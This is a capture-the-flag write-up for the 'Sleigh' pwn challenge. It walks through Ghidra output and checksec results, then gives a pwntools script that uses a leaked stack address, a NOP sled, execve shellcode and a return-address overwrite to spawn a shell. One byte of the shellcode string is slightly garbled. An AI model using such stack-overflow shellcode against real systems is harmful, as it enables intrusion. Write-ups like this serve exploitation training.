Day 2: Sleigh
The Elves have messed up with Santa's sleigh! Without it, he will not be able to deliver any gifts!!
Help him repair it and save the holidays!
We start off by looking at the binary decompiled using Ghidra.
Before that, when running the binary, we see the usual blinking colours and a prompt to repair the Sleigh.
They are kind enough to provide us with some location. (As we see, it is on the stack).
local_48 = 0;
local_40 = 0;
local_38 = 0;
local_30 = 0;
local_28 = 0;
local_20 = 0;
local_18 = 0;
local_10 = 0;
fprintf(stdout,"%s\n[!] There is something written underneath the sleigh: [%p]\n\n",&DAT_00100c98,
fprintf(stdout,"%s[*] This might help the repair team to fix it. What shall they do?\n> ",
Ahh! Another stack buffer overflow with write-what-where. Checking the permissions using
~/Desktop/CTF/CyberSantaCTF2021/pwn/pwnSleigh ❯ checksec sleigh
RELRO: Full RELRO
Stack: No canary found
NX: NX disabled
PIE: PIE enabled
RWX: Has RWX segments
We are in luck. Read-write and execute with NX disabled? Sounds perfect for shellcode! We can craft some shellcode and use the stack pointer location to redirect to it to spawn a shell, of couse needing some nop slides, if not it is not a sleigh!
from pwn import *
context.log_level = 'error'
binary = context.binary = ELF("./sleigh")
p = remote('22.214.171.124',30302)
p = process("./sleigh")
leaked_stack = int(p.recvline()[:-2], 16)
print("[+] Leaked Hex:", hex(leaked_stack))
shellcode = b"x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
payload = b'\x90' * 10
payload += shellcode
payload += b'A' * (72 - len(payload))
payload += p64(leaked_stack)